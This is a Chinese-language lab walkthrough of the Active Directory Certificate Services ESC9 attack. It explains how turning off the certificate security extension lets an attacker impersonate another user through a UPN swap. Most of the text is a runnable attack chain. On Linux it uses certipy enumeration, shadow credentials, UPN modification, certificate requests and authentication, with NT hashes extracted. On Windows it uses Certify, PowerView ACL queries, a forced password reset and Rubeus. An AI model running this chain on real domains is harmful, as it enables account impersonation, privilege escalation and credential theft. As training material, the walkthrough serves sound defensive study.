ESC9
1. 什么是ESC9
1.1. 理解ESC9和证书映射
ESC9的利用依赖证书映射。所以有必要理解这两个的关系。
请记住:如果证书模板的 msPKI-Enrollment-Flag 属性包含 CT_FLAG_NO_SECURITY_EXTENSION 标志,则会禁用 szOID_NTDS_CA_SECURITY_EXT 安全扩展的嵌入。这意味着,无论 StrongCertificateBindingEnforcement 注册表项的配置如何(默认值 1),映射过程都会如同该注册表项的值为 0 一样进行,从而绕过强证书映射。
因此,如果我们能修改某个账户的UPN,使其与另一个账户的 UPN 一样,那么就可以利用这个漏洞。通过通将 账户 A 的 UPN 修改为与 账户 B 一样,然后申请A用户的证书以B用户进行身份验证
2. 利用
2.1. 条件
StrongCertificateBindingEnforcement注册表项不为2(默认值为1),或者CertificateMappingMethods包含 UPN 标志 (0x4),普通用户无法读取这些注册表的值- 证书模板必须在
msPKI-Enrollment-Flag值中包含CT_FLAG_NO_SECURITY_EXTENSION标志 - 证书模板应明确指定其用途为
client authentication - 对一个用户至少有GenericWrite的权限,以修改UPN
2.2. On Linux
2.2.1. 枚举
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Template Name : ESC9
Display Name : ESC9
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectAltRequireEmail
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms PublishToDs AutoEnrollment NoSecurityExtensionPrivate Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-05-03T11:21:35+00:00
Template Last Modified : 2023-07-05T11:47:33+00:00
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Property Enroll : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
[+] User Enrollable Principals : LAB.LOCAL\Domain Users
[!] Vulnerabilities
ESC9 : Template has no security extension.[*] Remarks
ESC9 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.- 目标的
Enrollment Flag包含NoSecurityExtension标志,说明此模板的CT_FLAG_NO_SECURITY_EXTENSION标志的值为msPKI-Enrollment-Flag
2.2.2. 利用
此外还需要一个修改修改UPN的用户
这里的目标是User2
也可以通过dacledit.py来寻找目标
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# impacket-dacledit -action read -dc-ip 10.129.72.99 lab.local/blwasp:Password123! -principal blwasp -target user2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-2570265163-3918697770-3667495639-1103)
[*] ACE[24] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
[*] Access mask : FullControl (0xf01ff)[*] Trustee (SID) : blwasp (S-1-5-21-2570265163-3918697770-3667495639-1103)
然后使用Shadow Credentials获取目标的哈希
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy shadow auto -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.72.99 -target LAB-DC.lab.local -account user2
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'user2'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3ae93f3b6738482693a12dc54ad10b78'
[*] Adding Key Credential with device ID '3ae93f3b6738482693a12dc54ad10b78' to the Key Credentials for 'user2'
[*] Successfully added Key Credential with device ID '3ae93f3b6738482693a12dc54ad10b78' to the Key Credentials for 'user2'
[*] Authenticating as 'user2' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'user2@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'user2.ccache'
[*] Wrote credential cache to 'user2.ccache'
[*] Trying to retrieve NT hash for 'user2'
[*] Restoring the old Key Credentials for 'user2'
[*] Successfully restored the old Key Credentials for 'user2'
[*] NT hash for 'user2': ee22ddf0f8a66db4217050e6a948f9d6
然后更改User2UPN 为User3
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy account update -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.72.99 -target LAB-DC.lab.local -user user2 -upn user3@lab.local
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'user2':
userPrincipalName : user3@lab.local
[*] Successfully updated 'user2'
#确认一下
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# bloodyad --host 10.129.72.99 -d lab.local -u 'BlWasp' -p 'Password123!' get object user2 --attr userPrincipalName
distinguishedName: CN=User2,CN=Users,DC=lab,DC=local
userPrincipalName: user3@lab.local
然后使用User2请求证书(这里因为修改了UPN,所以会获取到User3的证书)
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'user2@lab.local' -hashes 'ee22ddf0f8a66db4217050e6a948f9d6' -dc-ip 10.129.72.99 -target LAB-DC.lab.local -ca lab-LAB-DC-CA -template ESC9
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 63
[*] Successfully requested certificate
[*] Got certificate with UPN 'user3@lab.local'
[*] Certificate has no object SID[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'user3.pfx'
[*] Wrote certificate and private key to 'user3.pfx'
- 这里的
Certificate has no object SID表示未提供objectSID,所以不会进行强映射,这里映射会使用UPN,所以可以使用user2的凭据获取到use3的证书
恢复user2的UPN
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy account update -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.72.99 -target LAB-DC.lab.local -user user2 -upn user2@lab.local
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'user2':
userPrincipalName : user2@lab.local
[*] Successfully updated 'user2'
使用user3的证书进行认证
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx user3.pfx -dc-ip 10.129.72.99
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'user3@lab.local'
[*] Using principal: 'user3@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'user3.ccache'
[*] Wrote credential cache to 'user3.ccache'
[*] Trying to retrieve NT hash for 'user3'
[*] Got hash for 'user3@lab.local': aad3b435b51404eeaad3b435b51404ee:01b60104db80993eb9ead5d8f9127eec
2.3. On Windows
2.3.1. 枚举
C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
Template Name : ESC9
Enabled : True
Publishing CAs : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Certificate Name Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT, NO_SECURITY_EXTENSION
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Client Authentication, Encrypting File System, Secure Email
Certificate Application Policies : Client Authentication, Encrypting File System, Secure Email
Vulnerabilities
ESC9 : The template has a client authentication EKU and no security extension.
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Write Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Dacl : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Property : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
枚举StrongCertificateBindingEnforcement注册表项是否设置为2(默认为1),或者 CertificateMappingMethods 注册表项是否包含 UPN 标志 ( 0x4 )
PS C:\Tools> reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
DependOnService REG_MULTI_SZ RpcSs\0Afd\0NTDS
Description REG_SZ @%SystemRoot%\System32\kdcsvc.dll,-2
DisplayName REG_SZ @%SystemRoot%\System32\kdcsvc.dll,-1
ErrorControl REG_DWORD 0x1
Group REG_SZ MS_WindowsRemoteValidation
ImagePath REG_EXPAND_SZ %SystemRoot%\System32\lsass.exe
ObjectName REG_SZ LocalSystem
Start REG_DWORD 0x2
Type REG_DWORD 0x20
StrongCertificateBindingEnforcement REG_DWORD 0x0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\Security
这里为0x0不满足条件,但下面的是0x4 满足,二者满足其一就可
PS C:\Tools> reg query HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel\
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
EventLogging REG_DWORD 0x1
CertificateMappingMethods REG_DWORD 0x4
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\Ciphers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\CipherSuites
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\Hashes
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\KeyExchangeAlgorithms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\Protocols
另一个要求是允许客户端身份验证,并且至少拥有对一个用户账号GenericWrite的权限,可以使用powerview进行查询
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $blwasp=(Get-DomainUser -Identity blwasp)
PS C:\Tools> Get-DomainObjectAcl -LDAPFilter "(&(objectClass=user)(objectCategory=person))" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -contains "GenericAll" -or $_.ActiveDirectoryRights -contains "GenericWrite") -and $_.SecurityIdentifier -eq $blwasp.objectsid}
<SNIP>
AceType : AccessAllowed
ObjectDN : CN=User2,CN=Users,DC=lab,DC=local
ActiveDirectoryRights : GenericAllOpaqueLength : 0
ObjectSID : S-1-5-21-2570265163-3918697770-3667495639-1192
InheritanceFlags : ContainerInherit, ObjectInherit
BinaryLength : 36
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2570265163-3918697770-3667495639-1103
AccessMask : 983551
AuditFlags : None
AceFlags : ObjectInherit, ContainerInherit, Inherited
AceQualifier : AccessAllowed
<SNIP>
2.3.2. 利用
修改用户2的密码,方便后面用用户2身份请求证书
PS C:\Tools> Set-DomainUserPassword -Identity user2 -AccountPassword $((ConvertTo-SecureString 'Newpassword123!' -AsPlainText -Force)) -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'user2'
VERBOSE: [Set-DomainUserPassword] Password for user 'user2' successfully reset
修改用户2 的UPN为用户3
PS C:\Tools> Set-DomainObject user2 -Set @{'userPrincipalName'='user3@lab.local'} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/DC=LAB,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=user2)(name=user2)(displayname=user2))))
VERBOSE: [Set-DomainObject] Setting 'userPrincipalName' to 'user3@lab.local' for object 'user2'
以用户2身份请求漏洞模板证书
C:\Users\user2\Desktop>Certify.exe request --ca LAB-DC.lab.local\lab-LAB-DC-CA --template ESC9
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate
[*] Current user context : LAB\user2
[*] No subject name specified, using current context as subject.
[*] Template : ESC9
[*] Subject : CN=User2, CN=Users, DC=lab, DC=local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 65
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9wxxxxxx
.\Rubeus.exe asktgt /user:user3 /certificate:user3.pfx /getcredentials /nowrap